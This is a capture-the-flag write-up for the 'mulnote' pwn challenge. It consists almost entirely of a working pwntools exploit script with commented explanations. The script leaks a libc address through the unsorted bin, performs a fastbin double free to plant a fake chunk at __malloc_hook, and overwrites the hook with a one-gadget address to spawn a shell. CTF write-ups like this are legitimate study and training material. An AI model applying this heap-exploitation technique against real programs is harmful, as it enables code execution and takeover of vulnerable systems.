byte ctf (pwn)

mulnote

A simple combined attack: an unsorted-bin leak of a libc pointer, followed by a fastbin double-free (fastbin dup) that overwrites `__malloc_hook` with a one-gadget address.

from pwn import *
# Verbose pwntools logging so every send/recv of the exploit is visible.
context(log_level='debug')

# ELF objects used for symbol lookups (only `lib` is actually read below),
# then the target process itself.
elf = ELF('mulnote')
lib = ELF('./libc.so')
sh = process('./mulnote')

def choice(achar):
    """Pick a menu entry: wait for the ``>`` prompt, then send *achar*.

    Not used by the exploit below (the other helpers send the menu key
    without waiting for the prompt), kept for completeness.
    """
    prompt = '>'
    sh.sendlineafter(prompt, achar)

def add(size, con):
    """Menu 'C': create a note of *size* bytes with content *con*.

    The menu key is sent immediately; the size and the content are each
    sent after a ``>`` prompt (both prompts end with that character).
    """
    sh.sendline('C')
    for reply in (str(size), con):
        sh.sendlineafter('>', reply)

def show():
    """Menu 'S': print the notes; the libc leak is read from its output."""
    key = 'S'
    sh.sendline(key)

def free(idx):
    """Menu 'R': release note number *idx* (answers the index prompt)."""
    sh.sendline('R')
    index_text = '{}'.format(idx)
    sh.sendlineafter('>', index_text)

def edit(idx, con):
    """Menu 'E': overwrite note *idx* with *con*.

    The index and the new content are each sent after a ``>`` prompt.
    """
    sh.sendline('E')
    for reply in ('{}'.format(idx), con):
        sh.sendlineafter('>', reply)

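######################## leak libc #####################
# Chunk 0 (0x100 bytes, above the fastbin range) lands in the unsorted bin
# when freed; chunk 1 keeps it from being merged into the top chunk.
# Allocating the same size again hands chunk 0 back with its fd pointer
# (into main_arena) still in place, and show() prints it.
add(0x100, '0')
add(0x20, '1')
free(0)
add(0x100, 'A')
show()
# A user-space pointer on x86-64 has 6 significant bytes (0x00007f....).
# The original sliced [-4:], which dropped the two low bytes of the pointer
# and made every offset derived from it wrong.
libc = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success("libc = %s" % hex(libc))
# The unsorted-bin fd is &main_arena.bins[0] - 0x10, i.e. main_arena + 88,
# and main_arena sits 0x10 past __malloc_hook in a glibc 2.23-style layout
# (consistent with the 0x45216 one-gadget offset below).  The original
# hard-coded "libc - 0x3c", which cannot be a valid base.  NOTE(review):
# verify both constants against the shipped ./libc.so.
libc_base = libc - (lib.symbols['__malloc_hook'] + 0x10 + 88)
# A real libc base is page aligned; fail early rather than corrupt the hook
# with a garbage address.
if libc_base & 0xfff:
    log.error("libc leak/offset mismatch, base = %s" % hex(libc_base))
log.success("libc_base = %s" % hex(libc_base))
malloc_hook = libc_base + lib.symbols['__malloc_hook']
# one_gadget offset for this libc.  `libc` is a plain int, so the original
# `libc.base` raised AttributeError before the attack even started.
one = libc_base + 0x45216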
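###################### fastbin dup -> __malloc_hook ######################
# Double free of a 0x70-sized fastbin chunk (3 -> 4 -> 3): chunk 4 in
# between defeats glibc's "double free or corruption (fasttop)" check, and
# chunk 3 is now linked into the fastbin list twice.
add(0x60, '3')
add(0x60, '4')
free(3)
free(4)
free(3)

# Allocation 5 returns chunk 3 and its content overwrites the fd of the
# copy still in the list, pointing it at a fake chunk at __malloc_hook-0x23
# (a spot whose size field reads as 0x7f, acceptable for this fastbin).
# Allocations 6 and 7 drain the list down to that fake chunk.
add(0x60, p64(malloc_hook - 0x23))  # 5
add(0x60, '6')
add(0x60, '7')
# Allocation 8 is the fake chunk; its user data starts at
# __malloc_hook - 0x13, so 0x13 bytes of padding place the one-gadget
# address exactly on __malloc_hook.  The original wrote the literal text
# 'x00' (missing backslash): 57 bytes of junk that put the gadget in the
# wrong place.
add(0x60, b'\x00' * 0x13 + p64(one))  # 8

# The next malloc() dispatches through __malloc_hook, so only the size
# prompt is answered -- the content prompt never arrives.  sendline needs
# str/bytes; the original passed the int 1.
sh.sendlineafter('>', 'C')
sh.sendlineafter('size>', '1')

sh.interactive()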